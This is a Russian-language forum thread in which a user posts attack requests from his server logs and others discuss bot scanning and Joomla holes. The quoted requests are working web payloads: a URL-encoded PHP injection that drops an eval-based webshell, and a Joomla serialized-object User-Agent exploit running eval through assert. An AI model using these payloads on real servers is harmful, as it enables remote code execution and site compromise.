LINUX.ORG.RU
ФорумTalks

Меня недавно пытались похакать

 , , , ,


0

2

Модераторам: если вы считаете этот топик слишком техническим — поумерьте в себе вахтёрский пыл и перенесите в веб-девелопмент; я не хочу обсуждать ничего технического тут, я просто в толксах посты писать пришёл; линукс тут при том, что на сервере линукс.

Такие дела: кто-то пытался сделать мне

/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B

и потом ещё
/administrator/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B

с вот таким вот юзерагентом
}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:46:"eval($_REQUEST[1]);JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";b:1;}\xf0\x9d\x8c\x86


Во-первых: опасносте, кто-то хакает интернеты. Урлы, на которые ломились кулхацкеры, публиковались только на ЛОРе, можно сделать вывод что кто-то хакает ЛОРовцев. Ну или меня лично, тогда опасносте нет.

Во-вторых: предлагаю обсудить это кулхацкерство.

В-третьих: в две тысячи шестнадцатом ещё бывают такие дырки в интернетах? Я думал что даже в похапе их уже много лет как позакрывали и научились больше не делать.

★★★★★

Во-вторых: предлагаю обсудить это кулхацкерство.

Не судите, да не судимы будете. Ну кто из нас не был молодым :)))

В-третьих: в две тысячи шестнадцатом ещё бывают такие дырки в интернетах?

Еще и не такие. Например, недавний прикол с ImageMagick...

Deleted
()

Стоит поднять любой веб-сервер, как минут через 30 его уже будут атаковать скрипт-киддз. Не стоит удивляться.

qrck ★★
()

Во-вторых: предлагаю обсудить это кулхацкерство.
с вот таким вот юзерагентом

обсуждали уже Жумла - решето

kiotoze ★★★★
()
Ответ на: комментарий от Harald

Первый раз за последние десять лет.
Обычно там что-нибудь более изобретательное или что-нибудь совсем тупое бывает. А в этот раз что-то среднее попалось, даже странно стало.

Goury ★★★★★
() автор топика

У меня на всех серверах в логах постоянно такие запросы появляются. Несколько лет как.

Боты ходят по сети. С этим ничего не поделать.

Разве что, можно организовать honeypot ;)

th3m3 ★★★★★
()

Это просто чудесно. Пытаются воспользоваться бекдором,
который выполняет всё PHP, которое придёт в параметре под именем «1».
Выполняют код, устанавливающий бекдор,
который выполняет всё PHP, которое придёт в параметре под именем «1».

facepalm.php

i-rinat ★★★★★
()

модераторы... поумерьте в себе вахтёрский пыл

С козырей зашёл прям сразу. Силён, тролляга!

В-третьих: в две тысячи шестнадцатом ещё бывают такие дырки в интернетах? Я думал что даже в похапе их уже много лет как позакрывали и научились больше не делать.

Ггг, ты ещё мал и глуп и не видал больших интернет-залуп :)

Deleted
()

Это роботы. Слава роботам.

lgbt
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.